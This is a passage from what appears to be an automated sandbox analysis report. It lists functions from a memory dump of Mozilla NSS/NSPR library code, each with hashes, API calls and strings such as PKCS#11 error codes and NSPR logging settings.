strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C666013

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: cb413bd7fe19975e8db190508b1c2af18509fb478be45c0260e59444acf785f9
Instruction ID: 5b4d9c7f4edac72f71a6bfd5cd596bcbd8be154e77d597a9289c0490c14ce948
Opcode Fuzzy Hash: cb413bd7fe19975e8db190508b1c2af18509fb478be45c0260e59444acf785f9
Instruction Fuzzy Hash: 2DC11870B045068BDB04CF1BD8917AABBF2AF45318F248229D9A5D7F42D731EC41CB9A

Function 6C674DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C675125

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: a251765879af4be4bc01fd42124b1bb7206c75f29545c1b89c720d01f716e732
Instruction ID: ec53789cd6a5d758581ccca475f6cf7fdc8353ae872d2988f74a85d1e67ed018
Opcode Fuzzy Hash: a251765879af4be4bc01fd42124b1bb7206c75f29545c1b89c720d01f716e732
Instruction Fuzzy Hash: 94E12870A083408FDB64DF28D48865ABBF0BF89318F119A2DF89997351E7709985CFD6

Function 6C7F5E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 6C7F5B90: PR_Lock.NSS3(00010000,?,00000000,?,6C6DDF9B), ref: 6C7F5B9E
Part of subcall function 6C7F5B90: PR_Unlock.NSS3 ref: 6C7F5BEA

memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C7F5E23,6C6DE154), ref: 6C7F5EBF

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: LockUnlockmemset
String ID:
API String ID: 1725470033-0
Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction ID: 063431fa64028b35309539b8833ee6c397c763529822eb607d6d4588e08bbadb
Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction Fuzzy Hash: 7F518D72E0021A8BDB18CF59C9819AEF7F2FF88314B19857DD825B7745E730A941CBA0

Function 6C7ADCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cfc5e9509d04bfa1db1caf4a2c09de6fd7cfdd2caa0f2087e6f8b677e6abe49
Instruction ID: e3a936982f734f283e753593fe9a9766ac1e382730993782fa46f625f119042c
Opcode Fuzzy Hash: 2cfc5e9509d04bfa1db1caf4a2c09de6fd7cfdd2caa0f2087e6f8b677e6abe49
Instruction Fuzzy Hash: FEF16A71A012058FDB08CF59C594BAA77B2BF89318F298278EC199B741DB35EC42CBD5

Function 6C741DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: 94b8ac35485b77b93b878d7c6c86414fb5048313dc0b7afd163b8b02f3f7b781
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: 7FD16A72E056668BDB118E18C9843DA7B63AB85328F1EC328CD745B7C6C37B9925C7D0

Function 6C6D8EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd2db65aa6ca7d0678fa39ff7a64e0bba7f139039ddb5557bd40675ecd12e034
Instruction ID: 7330e530fe21130bd10cf37daa4b9b2bbc6f41c9e07bf8f1d7abf58ea8d65551
Opcode Fuzzy Hash: fd2db65aa6ca7d0678fa39ff7a64e0bba7f139039ddb5557bd40675ecd12e034
Instruction Fuzzy Hash: 26110472A002058BD714DF15D88875AB3A5FF8A35CF05527AD8058FA62C375E882CBCA

Function 6C7B0C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fd427c34512d3923e2697fe6319beafdbe6acc143a4e09dc62ef40f6686f11
Instruction ID: f62a32bbfa48bd8a43f132323e7781b318b8690c2335518e1180c9971d923f51
Opcode Fuzzy Hash: e8fd427c34512d3923e2697fe6319beafdbe6acc143a4e09dc62ef40f6686f11
Instruction Fuzzy Hash: 1F11C1B47043458FCB10DF19C9C06AA77A1FF85368F148079D8199B701DB31E806CBE1

Function 6C723FF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Error
String ID:
API String ID: 2275178025-0
Opcode ID: 0ea1568604511c23aaa3719d9dbce582b1e32fd572c447a4c1a1e885636248de
Instruction ID: 537002c876d2e8a59fc5bd65440886cc39e9df15921f2a042d0ad3251a19deb0
Opcode Fuzzy Hash: 0ea1568604511c23aaa3719d9dbce582b1e32fd572c447a4c1a1e885636248de
Instruction Fuzzy Hash: 8EF05E70E0475D8BCB20DF69C55159BB7F4EF09258F109629EC89AB301EB30AAC5C7D1

Function 6C7B0D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 44f134235d8e1af03f201f58d3dc448f9e1d2a06d45aeef70d60784deeb0a455
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 12E0927A302154A7DB148E09C655AA97359EF81619FB4807DCC5DAFA41D733F8038781

Function 6C6DCC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d99f1c50c3963773bf3ac55bb7421fd8ea2a0273681edcf509fe187778b417
Instruction ID: ddbb14a428977dffa92efae674a60412cc96f6a0b8504bdca4cf8e483345df30
Opcode Fuzzy Hash: 05d99f1c50c3963773bf3ac55bb7421fd8ea2a0273681edcf509fe187778b417
Instruction Fuzzy Hash: 98C04838244608CFC744EE08E4899A43BA8AB8961970440A4EA028B722EA21F810CA80

Function 6C711D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6C711D46), ref: 6C712345

Strings

CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6C7122FF
CKR_MUTEX_NOT_LOCKED, xrefs: 6C712225
CKR_FUNCTION_CANCELED, xrefs: 6C711E73
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6C712320
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6C711DE0
CKR_SIGNATURE_LEN_RANGE, xrefs: 6C7120D9
CKR_PIN_INVALID, xrefs: 6C712057
CKR_MUTEX_BAD, xrefs: 6C711F49
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6C71227F
CKR_TOKEN_NOT_PRESENT, xrefs: 6C711F81
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6C71218D
CKR_PIN_LEN_RANGE, xrefs: 6C712061
CKR_TEMPLATE_INCOMPLETE, xrefs: 6C711F95
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6C711F0F
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6C712319
rv = 0x%x, xrefs: 6C712312
CKR_PIN_INCORRECT, xrefs: 6C711D92
CKR_TEMPLATE_INCONSISTENT, xrefs: 6C711EE1
CKR_CURVE_NOT_SUPPORTED, xrefs: 6C712179
CKR_OPERATION_ACTIVE, xrefs: 6C7122B8
CKR_INFORMATION_SENSITIVE, xrefs: 6C7122B1
CKR_PIN_EXPIRED, xrefs: 6C71206B
CKR_SIGNATURE_INVALID, xrefs: 6C7120CF
CKR_BUFFER_TOO_SMALL, xrefs: 6C712183
CKR_NEXT_OTP, xrefs: 6C71222F
CKR_DEVICE_MEMORY, xrefs: 6C711FF3
CKR_PIN_LOCKED, xrefs: 6C712075
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6C71232E
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6C711FD7
CKR_DEVICE_ERROR, xrefs: 6C71229D
CKR_RANDOM_NO_RNG, xrefs: 6C7122A7
CKR_WRAPPED_KEY_INVALID, xrefs: 6C711FB5
CKR_DEVICE_REMOVED, xrefs: 6C712261
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6C712275
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6C711F8B
CKR_OPERATION_CANCEL_FAILED, xrefs: 6C711F77
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6C71226B
CKR_STATE_UNSAVEABLE, xrefs: 6C712037
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6C712015
rv = %s, xrefs: 6C712340
CKR_FUNCTION_REJECTED, xrefs: 6C712289
CKR_OK, xrefs: 6C711DFC
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6C712327
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6C712293, 6C71233F
CKR_OBJECT_HANDLE_INVALID, xrefs: 6C71204D
CKR_NEW_PIN_MODE, xrefs: 6C711E9F
CKR_SAVED_STATE_INVALID, xrefs: 6C711E56

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: e821a1cb709400d2d42370be7c56c674172e0072fa30ecbbdebd41df1693553a
Instruction ID: 298797a86b751df04a51228f1c1391642f0a681e7df4bd5ea44cd9149ca178d4
Opcode Fuzzy Hash: e821a1cb709400d2d42370be7c56c674172e0072fa30ecbbdebd41df1693553a
Instruction Fuzzy Hash: C961142068E1C4D7D73C464C83AE36C21249753315FEC897BE6818EF94D26DCAC956D3

Function 6C745DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C745E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C745E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C745E5C
free.MOZGLUE(00000000), ref: 6C745E7E
free.MOZGLUE(00000000), ref: 6C745E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6C745EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C745EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C745ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C745EF0
free.MOZGLUE(00000000), ref: 6C745F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C745F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C745F5B
free.MOZGLUE(00000000), ref: 6C745F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C745FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C745FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C745FC4
free.MOZGLUE(00000000), ref: 6C745FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C745FE9
free.MOZGLUE(00000000), ref: 6C745FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C74600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C746027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C74605A
PR_smprintf.NSS3(6C81AAF9,00000000), ref: 6C74606A
free.MOZGLUE(00000000), ref: 6C74607C
free.MOZGLUE(00000000), ref: 6C74609A
free.MOZGLUE(00000000), ref: 6C7460B2
free.MOZGLUE(?), ref: 6C7460CE

Strings

pkcs11.txt, xrefs: 6C745F47, 6C745F7C, 6C74603A, 6C746053
flags, xrefs: 6C745E3A, 6C745EC6, 6C745F30
secmod.db, xrefs: 6C745EA0
noModDB, xrefs: 6C745EEA
secmod=, xrefs: 6C745FB1
configDir=, xrefs: 6C745F9D
%s/%s, xrefs: 6C746055
forceSecmodChoice, xrefs: 6C745F55
readOnly, xrefs: 6C745E56

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: 65d08abf50de986ff64ca2018dfece0a12997162a7691dd0f690025f5e693ee5
Instruction ID: fda142b3a2e2a4cca4346ab0275d06f8404816930647a8e9853715205982c81e
Opcode Fuzzy Hash: 65d08abf50de986ff64ca2018dfece0a12997162a7691dd0f690025f5e693ee5
Instruction Fuzzy Hash: 899128F09042155BEB608F64EE85FAB3BA8AF0634CF084430EC19DBB42E735D915D7A2

Function 6C6D1D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6C6D1DA3

Part of subcall function 6C7A98D0: calloc.MOZGLUE(00000001,00000084,6C6D0936,00000001,?,6C6D102C), ref: 6C7A98E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C6D1DB2

Part of subcall function 6C6D1240: TlsGetValue.KERNEL32(00000040,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D1267
Part of subcall function 6C6D1240: EnterCriticalSection.KERNEL32(?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D127C
Part of subcall function 6C6D1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D1291
Part of subcall function 6C6D1240: PR_Unlock.NSS3(?,?,?,?,6C6D116C,NSPR_LOG_MODULES), ref: 6C6D12A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D1DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C6D1E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C6D1EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C6D1ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C6D1EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C6D1F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6D1F34
PR_SetLogBuffering.NSS3(00004000), ref: 6C6D1F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C6D1F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6D1F83
PR_SetLogFile.NSS3(00000000), ref: 6C6D1FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C6D1FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6C6D1FCB
free.MOZGLUE(00000000), ref: 6C6D1FD2

Strings

%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6C6D1E27
, %n, xrefs: 6C6D1E6B
NSPR_LOG_MODULES, xrefs: 6C6D1DAD
bufsize, xrefs: 6C6D1E9B
Unable to create nspr log file '%s', xrefs: 6C6D1FB3
append, xrefs: 6C6D1EE6
NSPR_LOG_FILE, xrefs: 6C6D1F69
all, xrefs: 6C6D1F0E
sync, xrefs: 6C6D1E46
timestamp, xrefs: 6C6D1EC4

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: 54104a880ee63f3071ff288847fa6046373615dcdbf9da3136fa538f0172ebb4
Instruction ID: 8d699ca90d3a55ed1607a24cb5466a63e2e07527aa5d9a54194191ee6dd01471
Opcode Fuzzy Hash: 54104a880ee63f3071ff288847fa6046373615dcdbf9da3136fa538f0172ebb4
Instruction Fuzzy Hash: 2051AEB1E042199BDF109BE5CD48B9E77F8AF0531CF050928E819DBB41E7B0E518CB9A

Function 6C7B6E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C66CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6CF9C9,?,6C6CF4DA,6C6CF9C9,?,?,6C69369A), ref: 6C66CA7A
Part of subcall function 6C66CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C66CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C67BE66), ref: 6C7B6E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C67BE66), ref: 6C7B6E98
sqlite3_snprintf.NSS3(?,00000000,6C81AAF9,?,?,?,?,?,?,6C67BE66), ref: 6C7B6EC9
